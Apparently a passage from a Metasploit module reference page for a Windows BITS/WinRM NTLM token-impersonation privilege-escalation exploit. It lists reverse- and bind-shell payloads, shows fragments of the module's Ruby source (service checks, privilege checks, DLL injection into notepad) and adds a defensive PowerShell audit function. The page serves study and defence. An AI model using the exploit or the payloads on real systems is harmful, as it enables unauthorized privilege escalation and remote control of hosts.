207 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
208 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
209 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
210 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
211 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
212 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
213 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
214 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
215 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
216 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
217 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
218 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
219 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
220 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
221 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
222 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
223 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
224 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
225 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
226 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
227 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
228 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
229 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
230 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
231 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
232 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
233 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
234 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
235 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
236 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
237 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
238 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
239 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
240 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
241 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
242 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
243 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
244 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
245 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
246 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
247 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
248 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
249 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/local/bits_ntlm_token_impersonation exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Operating system: <OS>
- BITS behavior on Windows 7 and previous has not been shown vulnerable.
- Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.
- WinRM is running. Target is not exploitable.
- Failed to shutdown BITS.
- BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate.
- Session is already elevated.
- Failed to retrieve infos about WinRM and BITS. Access is denied.
- BITS is currently running. It must be down for the exploit to succeed.
- WinRM is currently running. It must be down for the exploit to succeed.
- BITS and WinRM are currently running. They must be down for the exploit to succeed.
- Unknown target arch; unable to assign exploit code
- Operation failed. Trying to elevate the current process...
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Operating system: <OS>
Here is a relevant code snippet related to the "Operating system: <OS>" error message:
154: privs = client.sys.config.getprivs
155: os = client.sys.config.sysinfo['OS']
156:
157: # Fast fails
158: if os.include?('Windows 7') || os.include?('Windows XP')
159: print_bad("Operating system: #{os}")
160: print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
161: return Exploit::CheckCode::Safe
162: end
163:
164: unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
BITS behavior on Windows 7 and previous has not been shown vulnerable.
Here is a relevant code snippet related to the "BITS behavior on Windows 7 and previous has not been shown vulnerable." error message:
  os = client.sys.config.sysinfo['OS']

  # Fast fails
  if os.include?('Windows 7') || os.include?('Windows XP')
    print_bad("Operating system: #{os}")
    print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
    return Exploit::CheckCode::Safe
  end

  unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
    print_bad('Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.')
Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.
Here is a relevant code snippet related to the "Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege." error message:
    print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
    return Exploit::CheckCode::Safe
  end

  unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
    print_bad('Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.')
    return Exploit::CheckCode::Safe
  end
  vprint_good('Target session has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.')

  running_services_code = check_bits_and_winrm
WinRM is running. Target is not exploitable.
Here is a relevant code snippet related to the "WinRM is running. Target is not exploitable." error message:
      shutdown_service(running_services_code)
      sleep(2)
      running_services_code = check_bits_and_winrm
    end
    if [WINRM, WINRM + BITS].include?(running_services_code)
      print_bad('WinRM is running. Target is not exploitable.')
      return Exploit::CheckCode::Safe
    elsif running_services_code == BITS
      if should_services_be_shutdown
        print_warning('Failed to shutdown BITS.')
      end
Failed to shutdown BITS.
Here is a relevant code snippet related to the "Failed to shutdown BITS." error message:
    if [WINRM, WINRM + BITS].include?(running_services_code)
      print_bad('WinRM is running. Target is not exploitable.')
      return Exploit::CheckCode::Safe
    elsif running_services_code == BITS
      if should_services_be_shutdown
        print_warning('Failed to shutdown BITS.')
      end
      print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
    end
  end

BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate.
Here is a relevant code snippet related to the "BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate." error message:
      return Exploit::CheckCode::Safe
    elsif running_services_code == BITS
      if should_services_be_shutdown
        print_warning('Failed to shutdown BITS.')
      end
      print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
    end
  end

  if is_system?
    print_bad('Session is already elevated.')
Session is already elevated.
Here is a relevant code snippet related to the "Session is already elevated." error message:
      print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
    end
  end

  if is_system?
    print_bad('Session is already elevated.')
    return Exploit::CheckCode::Safe
  end

  vprint_good('Session is not (yet) System.')
  Exploit::CheckCode::Appears
Failed to retrieve infos about WinRM and BITS. Access is denied.
Here is a relevant code snippet related to the "Failed to retrieve infos about WinRM and BITS. Access is denied." error message:
  check_command = 'powershell.exe Get-Service -Name BITS,WinRM'
  result = cmd_exec(check_command)
  vprint_status('Checking if BITS and WinRM are stopped...')

  if result.include?('~~')
    print_bad('Failed to retrieve infos about WinRM and BITS. Access is denied.')
    return -1
  end

  if result.include?('Stopped BITS') && result.include?('Stopped WinRM')
    print_good('BITS and WinRM are stopped.')
BITS is currently running. It must be down for the exploit to succeed.
Here is a relevant code snippet related to the "BITS is currently running. It must be down for the exploit to succeed." error message:
    print_good('BITS and WinRM are stopped.')
    return 0
  end

  if result.include?('Running BITS') && result.include?('Stopped WinRM')
    print_warning('BITS is currently running. It must be down for the exploit to succeed.')
    return BITS
  end

  if result.include?('Stopped BITS') && result.include?('Running WinRM')
    print_warning('WinRM is currently running. It must be down for the exploit to succeed.')
WinRM is currently running. It must be down for the exploit to succeed.
Here is a relevant code snippet related to the "WinRM is currently running. It must be down for the exploit to succeed." error message:
    print_warning('BITS is currently running. It must be down for the exploit to succeed.')
    return BITS
  end

  if result.include?('Stopped BITS') && result.include?('Running WinRM')
    print_warning('WinRM is currently running. It must be down for the exploit to succeed.')
    return WINRM
  end

  if result.include?('Running BITS') && result.include?('Running WinRM')
    print_warning('BITS and WinRM are currently running. They must be down for the exploit to succeed.')
BITS and WinRM are currently running. They must be down for the exploit to succeed.
Here is a relevant code snippet related to the "BITS and WinRM are currently running. They must be down for the exploit to succeed." error message:
    print_warning('WinRM is currently running. It must be down for the exploit to succeed.')
    return WINRM
  end

  if result.include?('Running BITS') && result.include?('Running WinRM')
    print_warning('BITS and WinRM are currently running. They must be down for the exploit to succeed.')
    return BITS + WINRM
  end
end

#
Unknown target arch; unable to assign exploit code
Here is a relevant code snippet related to the "Unknown target arch; unable to assign exploit code" error message:
    vprint_status('Assigning payload drunkpotato.x64.dll')
  elsif payload_arch.first == ARCH_X86
    dll_file_name = 'drunkpotato.x86.dll'
    vprint_status('Assigning payload drunkpotato.x86.dll')
  else
    fail_with(Failure::BadConfig, 'Unknown target arch; unable to assign exploit code')
  end
  library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'drunkpotato', dll_file_name)
  library_path = ::File.expand_path(library_path)

  print_status('Launching notepad to host the exploit...')
Operation failed. Trying to elevate the current process...
Here is a relevant code snippet related to the "Operation failed. Trying to elevate the current process..." error message:
    process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
    print_good("Process #{process.pid} launched.")
  rescue Rex::Post::Meterpreter::RequestError
    # Reader Sandbox won't allow to create a new process:
    # stdapi_sys_process_execute: Operation failed: Access is denied.
    print_error('Operation failed. Trying to elevate the current process...')
    process = client.sys.process.open
  end

  print_status("Injecting exploit into #{process.pid}...")
  exploit_mem, offset = inject_dll_into_process(process, library_path)
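The preconditions the module's check routine enforces (WinRM stopped, BITS stopped, and a session holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege) can be turned around into a host audit. The PowerShell below is an added example written for this page; it is not code from the module or from the Metasploit project. It assumes an elevated PowerShell on the host being audited, that Get-NetTCPConnection is available (Windows 8 / Server 2012 and later), and that secedit can export the local security policy. The function name Test-BitsWinRmExposure and all variable names are made up for the example.

```powershell
# Added example (not part of the module or this page): audit a host for the
# conditions the module checks, and look for an unexpected listener on 5985.
function Test-BitsWinRmExposure {
    [CmdletBinding()]
    param(
        # Port a genuine WinRM listener binds; the module's fake server uses the same one.
        [int] $WinRmPort = 5985
    )

    # 1. Service state: the module needs WinRM stopped and waits for BITS to stop.
    $svc   = Get-Service -Name BITS, WinRM -ErrorAction Stop
    $winrm = $svc | Where-Object { $_.Name -eq 'WinRM' }
    $bits  = $svc | Where-Object { $_.Name -eq 'BITS' }

    # 2. Who owns the listening socket? A real WinRM endpoint is served by HTTP.sys,
    #    so the owning process is System (PID 4). Any other owner deserves a look.
    $listeners = @(Get-NetTCPConnection -LocalPort $WinRmPort -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object {
            $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                Pid          = $_.OwningProcess
                ProcessName  = if ($p) { $p.ProcessName } else { '<unknown>' }
                Unexpected   = ($_.OwningProcess -ne 4)
            }
        })

    # 3. Which principals hold the two privileges the module requires on the foothold?
    #    secedit exports the local policy; [Privilege Rights] lists SIDs per privilege.
    $cfg    = Join-Path $env:TEMP ('secpol-audit-{0}.cfg' -f [guid]::NewGuid())
    $rights = @{}
    try {
        secedit /export /cfg $cfg /quiet | Out-Null
        foreach ($line in Get-Content -Path $cfg) {
            if ($line -match '^(SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege)\s*=\s*(.*)$') {
                $rights[$Matches[1]] = @($Matches[2].Split(',') | ForEach-Object {
                    $sid = $_.Trim().TrimStart('*')
                    # Translate the SID to an account name where possible; keep the SID otherwise.
                    try {
                        ([System.Security.Principal.SecurityIdentifier] $sid).Translate(
                            [System.Security.Principal.NTAccount]).Value
                    } catch { $sid }
                })
            }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue
    }

    [pscustomobject]@{
        WinRmStatus          = $winrm.Status
        BitsStatus           = $bits.Status
        PortListeners        = $listeners
        UnexpectedListener   = [bool]($listeners | Where-Object { $_.Unexpected })
        ImpersonateHolders   = $rights['SeImpersonatePrivilege']
        AssignPrimaryHolders = $rights['SeAssignPrimaryTokenPrivilege']
        # The module's fake WinRM server can only bind when nothing else owns the port.
        PortFreeForRogue     = ($winrm.Status -ne 'Running' -and $listeners.Count -eq 0)
    }
}

$report = Test-BitsWinRmExposure
$report | Format-List
if ($report.PortFreeForRogue) {
    Write-Warning 'WinRM is not running and nothing listens on 5985: the port is free for a rogue listener.'
}
if ($report.UnexpectedListener) {
    Write-Warning 'A process other than System is listening on 5985: investigate its owner.'
}
```

Read the report against the module's own logic: the module refuses to run when WinRM is running, so a host where the genuine service keeps port 5985 occupied fails the check routine's first service test, and a listener on 5985 owned by anything other than PID 4 is the artifact the fake WinRM server leaves while it waits for BITS. The privilege holders list is where to look for the foothold accounts the module needs; by default it names the built-in service identities and Administrators, so any extra entry is worth a question.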
Related Pull Requests
- #15575 Merged Pull Request: Update Gemfile.lock
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in rename_file method
- #15540 Merged Pull Request: Add option for running cmd_execute in a subshell
- #15303 Merged Pull Request: Fix dir method for windows shell sessions
References
- CVE: Not available
- https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
- https://github.com/antonioCoco/RogueWinRM
See Also
Check also the following modules related to this module:
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/tokenmagic
- exploit/linux/proxy/squid_ntlm_authenticate
- exploit/linux/local/ptrace_sudo_token_priv_esc
- exploit/multi/http/apache_apisix_api_default_token_rce
- exploit/unix/http/laravel_token_unserialize_exec
- auxiliary/admin/mssql/mssql_ntlm_stealer
- auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
- auxiliary/admin/oracle/ora_ntlm_stealer
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/scanner/http/ntlm_info_enumeration
- auxiliary/scanner/smtp/smtp_ntlm_domain
- auxiliary/server/capture/http_ntlm
- auxiliary/server/http_ntlmrelay
- auxiliary/admin/vmware/vcenter_forge_saml_token
- post/windows/gather/enum_domain_tokens
- post/windows/gather/enum_tokens
Authors
- Cassandre
- Andrea Pierini (decoder)
- Antonio Cocomazzi (splinter_code)
- Roberto (0xea31)
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.